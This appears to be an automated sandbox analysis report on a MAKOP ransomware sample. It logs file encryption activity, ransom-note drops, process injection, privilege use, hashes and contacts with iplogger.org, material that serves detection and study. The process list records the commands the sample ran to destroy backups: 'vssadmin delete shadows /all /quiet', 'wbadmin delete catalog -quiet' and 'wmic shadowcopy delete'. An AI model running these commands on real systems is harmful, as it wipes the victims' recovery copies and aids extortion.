File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File created	C:\Program Files\Java\jre7\lib\zi\America\Kentucky\readme-warning.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\bckgRes.dll.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN01165_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ADVZIP.DIC	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\WARN.WAV	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02389_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00524_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_COL.HXT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\WORDIRMV.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14691_.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BCSEvents.man	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART7.BDR	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\readme-warning.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\MS.CGM	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01241_.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02386_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Suspicious behavior: MapViewOfSection

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2052 wrote to memory of 1888	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2052 wrote to memory of 1888	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2052 wrote to memory of 1888	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2052 wrote to memory of 1888	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2052 wrote to memory of 1888	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1888 wrote to memory of 1124	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Windows\system32\cmd.exe
PID 1888 wrote to memory of 1124	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Windows\system32\cmd.exe
PID 1888 wrote to memory of 1124	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Windows\system32\cmd.exe
PID 1888 wrote to memory of 1124	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 2788	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1124 wrote to memory of 2788	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1124 wrote to memory of 2788	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1124 wrote to memory of 2628	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 1124 wrote to memory of 2628	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 1124 wrote to memory of 2628	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 1124 wrote to memory of 1860	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 1124 wrote to memory of 1860	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 1124 wrote to memory of 1860	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 1960 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1960 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1960 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1960 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1960 wrote to memory of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n1888

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	iplogger.org	udp
US	172.67.132.113:443	iplogger.org	tcp
US	8.8.8.8:53	c.pki.goog	udp
FR	216.58.214.67:80	c.pki.goog	tcp
US	8.8.8.8:53	crl.microsoft.com	udp
GB	2.18.190.71:80	crl.microsoft.com	tcp

Files

\Users\Admin\AppData\Local\Temp\nsyF1BF.tmp\System.dll

MD5	fccff8cb7a1067e23fd2e2b63971a8e1
SHA1	30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256	6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512	f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

memory/1888-7-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-10-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-9-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-16-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1888-26-0x0000000000400000-0x000000000041F000-memory.dmp

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\readme-warning.txt

MD5	d171c561e20fc9714f85da3c4331d0b6
SHA1	8f7e6cd4bda627a0a3d1a0e687c8b998db3b9438
SHA256	3c829147b1f82f255e4032d2a22d5b83932bc7f74f3540137146530be0353aac
SHA512	b52823ac0dba9dec6a243d1a3d68718c2a825dae4d6f4f312e92d87ecb87dbb066f259b317628fa588ad1abc4a59e095e5e302e53294bd8b34d414fadc8420c2

C:\Users\Admin\AppData\Roaming\779389082

MD5	40b7f298d30296864906d4e175ff9f43
SHA1	349b60915d0ce78aacc57231ae1e0df151e20087
SHA256	2448a49c12e2c959a2f88d179c346a4d753725578a4755c8f8f487b1048fdcd4
SHA512	ed4c76fa8e4e0eb527f34ea6a25094ee8bdc343be1c0806bcb8baff3cd77e6944cee50125090a7fd8869951b53ced7dce4a48a197859a1e4616c7495390b36e7

memory/1888-3038-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2548-3974-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2548-4646-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2548-4645-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Roaming\779389082

MD5	9004a085c4f744f4b0da676dcea1d70e
SHA1	f7119472a14b4d8292c07dd97ee1ae50713a7900
SHA256	7e62775833adf9177f3b95b60a8ae73b7942ad3b701752478af89516dcb2f237
SHA512	d5a8d02b944a1d1c4698ed9b50c8e67370468ee99105f933acd0e46244fef3b151e783516d49ea3d32e28f7a10d1a64498c1ff36892bd73af1c5b9979d973c04

memory/1888-17641-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2676-17696-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2676-17698-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2676-17697-0x0000000000400000-0x000000000041F000-memory.dmp

Sample ID	240728-t5tryssgmm
Target	RS.7z
SHA256	c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9
Tags	darkside credential_access discovery execution ransomware spyware stealer upx dearcry persistence hive defense_evasion impact lockbit evasion blackmatter babuk hades cryptone packer avoslocker conti avaddon trojan pyinstaller 512478c08dada2af19e49808fbda5b0b $2a$10$kmb3nsvqxc.93gyncgky/uq9hyhivf0e3hcajfiifr8hf3fmnofgm 7258 $2a$10$dfjplrxudytff.kmytq1rogsxjtjee8emqt65ftxltpjtxpzrhsaq 7178 medusalocker mespinoza sodinokibi makop

Malware Analysis Report

2024-09-11 02:34

Table of Contents